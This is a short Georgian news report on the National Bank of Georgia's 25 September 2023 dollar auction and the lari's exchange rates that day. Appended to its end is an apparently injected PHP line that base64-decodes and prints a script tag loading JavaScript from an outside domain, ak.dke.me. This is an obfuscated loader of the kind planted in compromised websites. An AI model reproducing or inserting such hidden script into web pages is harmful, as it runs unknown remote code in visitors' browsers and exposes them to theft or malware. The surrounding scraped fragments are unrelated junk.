celsiusi
ავერსი საქკაბელი

 დღეს ეროვნულმა ბანკმა მორიგი სავალუტო აუქციონი გამართა - სებ-ის ინფორმაციით, გასაყიდად გამოტანილი იყო $30 მილიონი დოლარი, საიდანაც ბაზარმა $7.6 მილიონი აითვისა. ეს ბოლო 10 დღეში სებ-ის რიგით მესამე სავალუტო ინტერვენციაა, წინა აუქციონებით სებ-მა $20 და $37 მილიონი დოლარი გაყიდა. სამივე აუქციონზე კი სულ 64.7 მლნ დოლარი გაიყიდა.

"2023 წლის 25 სექტემბერს გამართულ საქართველოს ეროვნული ბანკის სავალუტო აუქციონზე სებ-ის მიერ გასაყიდად გამოტანილი იქნა 30 მილიონი აშშ დოლარი. აუქციონზე გაიყიდა 7 600 000 აშშ დოლარი, საშუალო შეწონილმა გაცვლითმა კურსმა 2.6682 შეადგინა,"- ნათქვამია სებ-ის მიერ გამოქვეყნებულ ინფორმაციაში. 

მნიშვნელოვანია გარემოება, რომ სებ-ი ინტერვენციების შესახებ ინფორმაციას სამუშაო დღის 17:00-მდე, ანუ კურსის გამოცხადებამდე აქვეყნებდა, თუმცა დღეს ინტერვენციის შესახებ კურსის გამოცხადებიდან პოსტ-ფაქტუმ გახდა ცნობილი. 

25 სექტემბრის ვაჭრობის შედეგად, საქართველოს ეროვნული ვალუტა ამერიკულ დოლართან მიმართებით 1.35 თეთრით გამყარდა და ოფიციალური გაცვლითი კურსი 2.6681 გახდა.

ევროსთან მიმართებით ლარი 1.40 თეთრით გამყარდა და 1 ევროს ღირებულებამ 2.8381 ლარი შეადგინა.

რაც შეეხება ბრიტანულ სტერლინგს, ამ შემთხვევაში ლარი 1.95 თეთრით გამყარდა და ახალი კურსი 3.2647  შეადგენს.

ერთი ლირა კი 9.81 თეთრი ღირს.

475
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");